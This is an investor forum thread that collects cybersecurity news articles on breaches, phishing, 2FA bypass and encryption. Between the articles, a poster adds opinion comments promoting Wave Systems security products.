Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Is Privileged Access Management still a pain?
https://www.helpnetsecurity.com/2019/01/08/privileged-access-management/
Every week seems to bring the story of a new customer data breach, but regardless of the individual details, the majority of incidents have one trait in common. The chances are high that the breach was made possible through the compromise of privileged accounts and passwords, usually acquired through social engineering via phishing emails.
Once credentials have been stolen, unauthorised access can often go undetected for weeks or even months at a time, enabling the intruder to undertake a huge level of data exfiltration or lay the foundations for an even greater attack. One of the most dangerous outcomes is for the attacker to escalate their activities and gain access to a privileged account.
What makes a privileged account so important?
Commonly also called superusers, privileged accounts are one of the fundamental building blocks of the IT environment, used by humans, applications and services to run tasks requiring elevated permissions. Accordingly, privileged accounts have many advanced powers and permissions, including creating and modifying other user accounts, freely remote access into all machines on the network, and retrieving sensitive data. They can even make significant changes to the network infrastructure itself.
Gaining control of a privileged account is a huge coup for a cybercriminal as these powers can be used to facilitate many different malicious actions. Armed with superuser credentials, attackers can bypass normal security controls to access sensitive data and install malware anywhere on the network with impunity. They can also disguise their activity by erasing audit trails and destroying evidence, greatly increasing their potential dwell time and confounding investigations by the security team.
The ability to protect superuser accounts from being compromised can make the difference between a minor network intrusion and a breach that devastates the organisation. However, despite their importance and the threat they pose in the wrong hands, many IT users are careless with privileged accounts. Even users who have access to these accounts as part of their role may not fully appreciate their power and how dangerous their misuse can be.
Being equipped with a Privileged Access Management (PAM) solution is one of the best ways to keep privileged accounts under control and well-protected. These tools make it much easier to govern access to privileged accounts and can be used to monitor and limit active sessions to prevent misuse. However, some IT teams have come to fear PAM tools, considering them expensive, resource heavy, and overly complicated.
Lingering disrepute
Much of the maligned reputation around PAM stems from experiences with legacy software. In many cases, previous generations of PAM solutions were overly complex and difficult to implement. The installation process could require the use of specialised professionals and could sometimes take several months or even years to fully complete – or perhaps remain unfinished indefinitely. The combination of specialists and lengthy implementation times meant that many IT teams decided the cost of PAM simply wasn’t worth it.
It should be noted that these experiences often come from a very different time in cyber security. For many years, the best way to protect sensitive information and assets was to build a fence around them. With all data flowing in and out through a single access point, the traditional perimeter could keep out the majority of threats. Under this set up, IT teams could more readily assume that their networks would be protected without the use of PAM.
Today however, the perimeter approach is no longer effective and is easily circumvented if attackers can gain access to login credentials. Remote working practices have also greatly increased the surface area for attack and made it even easier to slip through the perimeter. Likewise, traditional security tools don’t flag when someone is using legitimate resources for inappropriate activities, making them ill-suited for this new model.
Starting a fresh PAM journey
Employing PAM capabilities is essential for an organisation to protect its privileged accounts from falling into the wrong hands, so any IT teams still put off by past lessons can now have a positive PAM experience as it is no longer costly, complex or requires specialised skills.
PAM is an important priority for all organisations and any previous challenges can be overcome by beginning with thorough planning and assessment. The main priority is to identify all accounts with elevated powers and ensure there are clear policies about proper usage and responsibilities. The account audit required to get started with PAM can help demonstrate compliance with the GDPR, PCI, ISO and other regulations and can also directly help to turn up evidence of unusual behaviour that indicates a breach or credential misuse.
Establishing a solid foundation will make the process of managing and securing privileged accounts much more scalable and flexible, helping organisations avoid the lengthy and expensive implementation processes of old. The rapidly expanding market now includes many different options for PAM solutions that can be easily installed out-of-the-box without the need for specialised skills and expertise. For example, PAM-as-a-Service can now easily be consumed from the cloud – securing privileged access to critical assets without the need for implementation.
The right PAM solution will leave organisations in a much stronger position to protect their privileged accounts from cyber criminals who have adopted credential theft and escalation as their main modus operandi. With proper planning and a flexible and scalable approach, companies can reap the benefits without the implementation headaches of legacy solutions.
=================================================================
If an IT administrator is going to protect privileged access why not protect all access? How would the Privileged Access Management (PAM) protect accounts that are nefariously upgraded to privileged access? See link below for such an incident. Wave VSC 2.0 - Better security at less than half the cost!
=================================================================
Researcher finds simple way of backdooring Windows PCs and nobody notices for ten months
https://www.zdnet.com/article/researcher-finds-simple-way-of-backdooring-windows-pcs-and-nobody-notices-for-ten-months/
"RID Hijacking" technique lets hackers assign admin rights to guest and other low-level accounts
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=144344217
===============================================================
Wave VSC 2.0 would protect privileged and low-level accounts and prevent the low-level accounts from nefariously being upgraded to privileged. imo. See above ihub link for more information.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Boards need to be active partners in cyber defence
https://www.computerweekly.com/news/252455381/Boards-need-to-be-active-partners-in-cyber-defence
Board members must be active governance partners in collaborative cyber defence, says US regional information sharing and analysis organization
Defending against cyber attackers requires collaboration across organisational functions and between organisations, according to a report by the Advanced Cyber Security Center (ACSC).
The report urged boards to adopt a comprehensive and dynamic understanding of their organisations’ cyber security responsibilities and to maintain regular direct access to CISOs and risk officers in conjunction with CIOs and other executives.
The report, based on a survey of 20 ACSC member CISOs and CIOs from diverse organisations and interviews with external experts, was intended to provide a perspective on the current state of board engagement in cyber security.
It also described the benefits and challenges of maturing board engagement and included recommendations for model board engagement.
The New England-based ACSC is a federally registered regional information sharing and analysis organisation (ISAO) aimed at encouraging cross-sector collaboration and promoting effective practices to help organisations strengthen their cyber defences.
According to the report, in most cases the board partnership with management is still “at an early stage” or in a “maturing phase” in its ability to provide strategic guidance and help guide management’s strategic risk judgements.
Because most boards do not yet have sufficient expertise in technology or cyber security to serve as strategic thought partners on cyber risk, the report recommended that they should recruit board members with broad digital or technology expertise, develop an annual curriculum of cyber briefings, provide ongoing training and use third-party assessments.
A key finding of the survey was that placing cyber security in an organisational silo at the operational or board level makes it difficult to develop a comprehensive and nuanced understanding of cyber security’s impact on business risk.
Boards generally spend one meeting a year on cyber security, delegating responsibility to the risk or audit committee, leaving the full board with little time to develop expertise on the cyber risks, the survey showed.
The report recommended that CISOs and CIOs should present jointly at board meetings to provide a comprehensive view of digital strategies and security.
“Boards as a whole should review cyber security more consistently as a business risk and the risk or audit committee should be used for more frequent (at least quarterly) cyber reviews,” the report said.
The survey showed that as cyber security budgets continue to grow, two issues have arisen The first is “budget fatigue” and the second is that cyber security investments are seen as “separate” from IT investments and so do not represent a complete picture of security spend.
In terms of overseeing cyber security and digital transformation budgets, the report recommended that boards should present digital transformation budgets as a whole, with cyber security investments as an element of overall IT-related decisions about where to invest in growth and security.
Boards and management require cyber risk frameworks that provide a means to make informed risk judgements, the report said, noting that cyber security has not yet developed the standard risk frameworks that financial and audit risk functions have.
In the light of this fact, the report recommended that boards should prioritise and support senior management’s development of a new generation of outcome-based cyber risk management frameworks. “In the meantime, executives should use only a few operational metrics with boards,” it said.
Michael Figueroa, executive director of the ACSC, said the report examines the reality that, for the most part, boards are not in a position to provide strategic guidance on cyber risk.
“In particular, the report has identified a need for a risk standard, much like those frameworks that financial and audit risk functions have refined over decades, that would help guide decision-making and operations as they relate to cyber risk management,” he said.
=================================================================
If board members and CISOs were asked to read the Wave Alternative and if the CISOs could be asked to compare their cyberdefenses with Wave VSC 2.0, Wave ERAS, Wave SED management and Wave Endpoint Monitor, they could very well see the light to a better cyber future!! imo.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-endpoint-monitor
================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
'You can't relax': Here's why 2-factor authentication may be hackable
https://www.cnbc.com/2019/01/04/how-secure-is-your-account-two-factor-authentication-may-be-hackable.html
•Cybercriminals can now use a type of phishing to get around two-factor authentication, typically a code sent your cellphone that is needed to log in, according to cybersecurity firm KnowBe4.
•KnowBe4 used LinkedIn for its demo, but said many other websites are also vulnerable.
•The code for the attack is now public, according to KnowBe4.
In a quest to make online accounts safer, many services now offer two-factor authentication. The system typically sends a code to a user's mobile phone that they need log in, along with a username and password.
Cybersecurity professionals have advised enabling two-factor to add an extra layer of security — but according to at least one expert, this may not be a silver-bullet. Kevin Mitnick, who was once the FBI's most wanted hacker and now helps companies defend themselves, found that two factor authentication can be vulnerable.
"Just by enabling two-factor authentication, you can't relax…a smart attacker could get access to your account," Mitnick said in an interview with CNBC. He is the chief hacking officer at KnowBe4, a cybersecurity company that trains people to spot phishing, or spoofed emails.
Mitnick told CNBC he found out about the vulnerability when it was posted online for anyone to find.
"The tool to actually pull these attacks off has been made public. So any 13-year-old could download the tool and actually carry out these attacks," he said.
According to Mitnick, the attack begins when a cybercriminal sends an email that looks real, and asks the receiver to click on a link.
Once the user clicks on the link, they are directed to log into the real website, including entering the code sent to their cellphone. Secretly, however, the log in went through the hacker's server and they were able to get the session cookie, the expert explained.
"If we can steal the user session cookie, we could become them, and we don't need their username, their password, or their two-factor," Mitnick said.
Mitnick showed CNBC that he was able to enter that code into his browser. "When I hit refresh I'm going to be magically logged into the victims account," he said.
Mitnick used LinkedIn to demo the attack for CNBC, but said many other websites are also vulnerable. The email he clicked on looked like a real LinkedIn connection request — but actually came from a fake domain, lnked.com. He said most people may not realize the difference.
"It's not LinkedIn that's vulnerable. It's the actual user… It's a security flaw with the human," Mitnick said.
In a statement, Mary-Katharine Juric, a LinkedIn spokesperson, told CNBC that the professional network took Mitnick's demonstration "very seriously," and that LinkedIn has "a number of technical measures in place to protect our members from fraudulent activity including phishing scams."
She added: "When we detect this type of activity, we work to quickly remove it and prevent future re-occurrences. We strongly encourage members to report any messages or postings they believe are scams, and utilize our member help center as a resource to educate and protect themselves from frauds online."
This attack is part of what is known as social engineering, when hackers take advantage of human behavior to get you to do something, like click on a link. Another way to protect yourself is to pay close attention to email you get, even if you use two-factor authentication.
"Social engineering if you do it right can be used to get into almost anything," said Stu Sjouwerman, KnowBe4'S CEO.
To protect from attacks like this one, some companies are making tools called security keys.
Instead of sending a code to your cell phone, security keys — which look like a keychain — contain a hardware chip, and use Bluetooth or USB to be the additional factor needed to log into your account. Recently, Google released its own version of the device, which it calls the Titan Security Key.
"The security key stores its own password and requires the site to prove it's legit before releasing the password and getting you signed in," said Mark Risher, Google's director of product management for security and privacy.
"It's not ubiquitous by a long shot but we are encouraged to see more and more sites and apps," he added.
=================================================================
See link below for information on tokens and why the laptop with a TPM (and Wave VSC 2.0) could be better than a security key.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
*Actual number may vary. Contact us today to receive more details and a free quote.
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases ? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
Hacker leaks data on Angela Merkel and hundreds of German lawmakers
https://techcrunch.com/2019/01/04/germany-data-breach-lawmakers-leak/?sr_share=twitter&utm_source=tctwreshare
A hacker has targeted and released private data on German chancellor Angela Merkel i and other senior German lawmakers and officials.
The data was leaked from a Twitter account, since suspended, and included email addresses, phone numbers, photo IDs and other personal data on hundreds of senior political figures.
According to a government spokesperson, there was no “sensitive” data from the chancellor’s office, but other lawmakers had more personal data stolen. Other portions of the leaked data included Facebook and Twitter passwords. Some had their credit card information stolen, and chat logs and private letters published in the breach.
Germany’s Federal Office for Information Security said in a statement that it was “extensively investigating” the breach, but does not believe there was an attack on the government’s networks.
It’s been reported that the hacker may have obtained passwords to access social media accounts. Often, hackers do this by tricking a phone company into “porting out” a person’s phone number to another SIM card, allowing them to password reset accounts or obtain two-factor codes.
The hacker leaked data on senior lawmakers across the political spectrum, but noticeably absent were accounts for the country’s far-right Alternative for Germany party.
The hack is reminiscent of a data breach involving the Democratic National Committee in 2016, which targeted the Democrats in the U.S. in the months running up to the U.S. presidential election. The U.S. government later attributed the hack to Russia, which prosecutors say tried to influence the election to elect Donald Trump to the White House. The Justice Department brought charges against seven suspects earlier this year for being part of the so-called “Fancy Bear” group of hackers, working on behalf of the Russian government.
Little is known about who is behind the leak of German lawmakers’ data. The German government has not speculated about who — or if a nation state — may have been behind the attack. But the alleged hacker said in a statement linked from their Twitter account that they “operated alone and does not belong to any organization or similar on Twitter.”
According to security experts who’ve seen portions of the data, the hacker spread the stolen information across several sites and mirrors, making it “really hard to take down.”
Germany’s minister for justice Katarina Barley called the breach a “serious attack,” one that aimed to “damage confidence in our democracy and institutions,” according to the BBC.
It’s not the first time that the German parliament has faced security issues. In 2015, attackers stole gigabytes of data on lawmakers, which Germany’s domestic spy agency later accused Russia of being behind the breach.
Russia has repeatedly denied launching cyberattacks.
=================================================================
If Germany and other countries had been using Wave products, events like these wouldn't have happened. imo. Better security at less than half the cost!!
==================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Phishing Tactic Hides Tracks with Custom Fonts
https://threatpost.com/phishing-custom-fonts/140563/
The phishing campaign is using a new technique to hide the source code of its landing page – and stealing credentials from customers of a major U.S.-based bank.
An insidious phishing method evades detection using a never-before-seen technique that leverages custom fonts to cover its tracks.
Researchers at Proofpoint recently discovered an active credential harvesting phishing scheme. Once a victim has clicked on the initial phishing email, the resulting landing page looks like a login page for a major U.S. bank – but in reality the page is bent on stealing banking customers’ credentials, Chris Dawson, threat intelligence lead at Proofpoint, told Threatpost. The phishing kit uses custom web fonts to obfuscate the source code for the landing page – making it seem harmless.
“While encoded source code and various obfuscation mechanisms have been well documented in phishing kits, this technique appears to be unique for the time being in its use of web fonts to implement the encoding,” researchers at Proofpoint said in a Thursday analysis of the technique.
Upon further analyzing the landing page, researchers were surprised to find that the source code of the page includes unexpectedly encoded display text – even when it has been copied and pasted into a text file.
Behind this trick are Web Open Font Format (WOFF) files, which are web font files created in an open format that delivers webpage fonts. The base64-encoded woff and woff2 files install a substitution cipher.
Essentially the substitution ciphers replace the expected alphabetical letters shown to the victim on the page (“abcdefghi…”) with other letters in the source code.
For potential victims looking at the page, the trick means their browser renders the ciphered text as plaintext – essentially making the true purpose of the landing page harder to detect.
These substitution functions are also identified in the CSS code for the landing page, differing from those used in other phishing kits, which are frequently implemented in JavaScript.
The phishing technique has one other trick up its sleeve: Using the images of the bank’s branding in scalable vector graphics format, so that the logo and its source do not appear in the source code. That sidesteps the process of linking to actual logos and other visual resources, which could potentially be detected by the impersonated brand.
Dawson said that the phishing kit was first observed being used in May 2018 – but it is possible that the kit appeared in the wild earlier. And, it’s still being used, with a number of active domains hosting the kit.
Potential victims as always should be extremely careful about clicking URLs and going directly to bank websites instead of following links.
“This is really just one more way in which threat actors are looking to hide their tracks,” Dawson told us. “Whether that is through a variety of code mechanisms or new novel ways of getting around detection, it’s all just a matter of being more effective.”
=================================================================
Wave VSC 2.0 helps protect against a clever phishing trick like the one in this article even if the phishing landing page is not detected. This is a strong advantage over products that try to detect the phishing. imo.
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Key Feature:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Strong Security
Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Toxic Data: How 'Deepfakes' Threaten Cybersecurity
https://www.darkreading.com/application-security/toxic-data-how-deepfakes-threaten-cybersecurity-/a/d-id/1333538?_mc=KJH-Twitter-2018-12
The joining of 'deep learning' and 'fake news' makes it possible to create audio and video of real people saying words they never spoke or things they never did.
"Fake news" is one of the most widely used phrases of our times. Never has there been such focus on the importance of being able to trust and validate the authenticity of shared information. But its lesser-understood counterpart, "deepfake," poses a much more insidious threat to the cybersecurity landscape — far more dangerous than a simple hack or data breach.
Deepfake activity was mostly limited to the artificial intelligence (AI) research community until late 2017, when a Reddit user who went by "Deepfakes" — a portmanteau of "deep learning" and "fake" — started posting digitally altered pornographic videos. This machine learning technique makes it possible to create audio and video of real people saying and doing things they never said or did. But Buzzfeed brought more visibility to Deepfakes and the ability to digitally manipulate content when it created a video that supposedly showed President Barack Obama mocking Donald Trump. In reality, deepfake technology had been used to superimpose President Obama's face onto footage of Jordan Peele, the Hollywood filmmaker.
This is just one example of a new wave of attacks that are growing quickly. They have the potential to cause significant harm to society overall and to organizations within the private and public sectors because they are hard to detect and equally hard to disprove.
The ability to manipulate content in such unprecedented ways generates a fundamental trust problem for consumers and brands, for decision makers and politicians, and for all media as information providers. The emerging era of AI and deep learning technologies will make the creation of deepfakes easier and more "realistic," to an extent where a new perceived reality is created. As a result, the potential to undermine trust and spread misinformation increases like never before.
To date, the industry has been focused on the unauthorized access of data. But the motivation behind and the anatomy of an attack has changed. Instead of stealing information or holding it ransom, a new breed of hackers now attempts to modify data while leaving it in place.
One study from Sonatype, a provider of DevOps-native tools, predicts that, by 2020, 50% of organizations will have suffered damage caused by fraudulent data and software. Companies today must safeguard the chain of custody for every digital asset in order to detect and deter data tampering.
The True Cost of Data Manipulation
There are many scenarios in which altered data can serve cybercriminals better than stolen information. One is financial gain: A competitor could tamper with financial account databases using a simple attack to multiply all the company's account receivables by a small random number. While a seemingly small variability in the data could go unnoticed by a casual observer, it could completely sabotage earnings reporting, which would ruin the company's relationship with its customers, partners, and investors.
Another motivation is changing perception. Nation-states could intercept news reports that are coming from an event and change those reports before they reach their destination. Intrusions that undercut data integrity have the potential to be a powerful arm of propaganda and misinformation by foreign governments.
Data tampering can also have a very real effect on the lives of individuals, especially within the healthcare and pharmaceutical industries. Attackers could alter information about the medications that patients are prescribed, instructions on how and when to take them, or records detailing allergies.
What do organizations need to consider to ensure that their digital assets remain safe from tampering? First, software developers must focus on building trust into every product, process, and transaction by looking more deeply into the enterprise systems and processes that store and exchange data. In the same way that data is backed up, mirrored, or encrypted, it continually needs to be validated to ensure its authenticity. This is especially critical if that data is being used by AI or machine learning applications to run simulations, to interact with consumers or partners, or for mission-critical decision-making and business operations.
The consequences of deepfake attacks are too large to ignore. It's no longer enough to install and maintain security systems in order to know that digital assets have been hacked and potentially stolen. The recent hacks on Marriott and Quora are the latest on the growing list of companies that have had their consumer data exposed. Now, companies also need to be able to validate the authenticity of their data, processes, and transactions.
If they can't, it's toxic.
=================================================================
Some more reasons to have organizations' sensitive information protected by Wave VSC 2.0 and Wave SED Management. Using the Wave Alternative could save organizations a lot of money and headaches.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
==================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Happy New Year! see post
The Best Data Breach Tactics to Deploy Now
https://www.infosecurity-magazine.com/opinions/data-breach-tactics-deploy/?utm_source=dlvr.it&utm_medium=twitter
A top-of-mind question for business leaders across all industries is how to eliminate the risk of a data breach. In addition to removing sensitive data from your business process, there are two other tactics you should deploy: application-level encryption and strong authentication.
Though it is generally accepted that encrypting sensitive data will protect your organization, most people in the security business don’t realize that not all encryption is equal. Even when using NIST-approved algorithms with the largest key sizes available, data is still at risk.
How is that possible? Well, all other things being equal in the cryptographic sense, two design decisions matter when encrypting data: 1) Where the data is being cryptographically processed and 2) How are cryptographic keys being managed?
First, let’s address processing. If data is encrypted and decrypted in any part of the system (e.g., the hard disk drive, operating system, database) other than the business application using that data, significant residual risks remain despite the encryption.
An attacker needs to only compromise a software layer above the encrypting layer to see unencrypted (plaintext) data, because the decrypting layer below will already have decrypted the sensitive data before sending it to layer above in the stack.
Since the application layer is the highest layer in the technology stack, this makes it the most logical place to protect sensitive data, as it affords the attacker the smallest target (in order to compromise sensitive data within the application layer, the attacker will have had to find a vulnerability within the application – or the administrator's credential - and access regions of memory accessible only to the application or the administrator).
This also ensures that, once data leaves the application layer, it is protected no matter where it goes (and conversely, must come back to the application layer to be decrypted).
In terms of how cryptographic keys are managed and protected, if you use a general-purpose file, keystore, database or device to store your keys, this would be the equivalent of leaving company cash in a general-purpose desk or drawer. In the same way that you need a safe to store cash in a company, you need a purpose-built key management solution designed with hardened security requirements to protect cryptographic keys.
These solutions have controls to ensure that, even if someone gains physical access to the device, gaining access to the keys will range from very hard to nearly impossible. If the key management system cannot present sufficiently high barriers, even billion-dollar companies will fail to protect sensitive data – as many recently have and continue to do.
Though the details and complexity of cryptography can seem taxing, it is important to recognize that an encryption solution provides the last bastion of defense against determined attackers. It is well worth a company’s time to give both application-level encryption and key management the proper attention.
While encryption is a best practice, so is strong authentication. In fact, it should be the first line of defense. Strong authentication is the ability to use different cryptographic keys combined with secure hardware (in the possession of the user) to confirm that the user is who they claim to be.
While digital certificates on smartcards provided such capability for over two decades, they are expensive and difficult to use and support, even in highly technical environments. The FIDO Alliance is attempting to simplify this problem by eliminating passwords entirely; some early solutions have already made it to market this year, with successful deployments under way.
With strong authentication as the first line of defense and application-level encryption backing it up, even if an attacker managed to slip past network defenses – as they always seem to do – there will be little opportunity to compromise sensitive data.
While no security technology is absolutely fool-proof, when implemented correctly, these two security technologies raise the bar sufficiently high to “encourage” the vast majority of attackers to move onto easier targets.
=================================================================
Its interesting that two of Wave's products, Wave VSC 2.0 (2FA) and Wave SED management (encryption) provide premier protection that could be used to thwart attackers. This article basically discusses the same strategy (2FA and encryption) that Wave had long ago for protecting sensitive information. Better security at less than half the cost. Wave has better backing in ESW Capital than a company like StrongKey (company of writer). imo. To see Wave's two flagship products essentially confirmed in an article like this for protecting sensitive information is great.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Smart home charging networks vulnerable to cyber attacks
https://www.electrive.com/2018/12/16/smart-home-charging-networks-vulnerable-to-cyber-attacks/
Kaspersky Lab, an IT specialist firm from Russia, warns that electric vehicle chargers supplied by a “major vendor” are vulnerable to cyber attacks that could damage the home grid. Experts from Fraunhofer SIT have looked into the issue as well and developed a solution scenario.
While the Fraunhofer experts have been modelling said cyber attacks on charging stations, the engineers from Kaspersky Lab practically managed to break into home charging systems currently on the market.
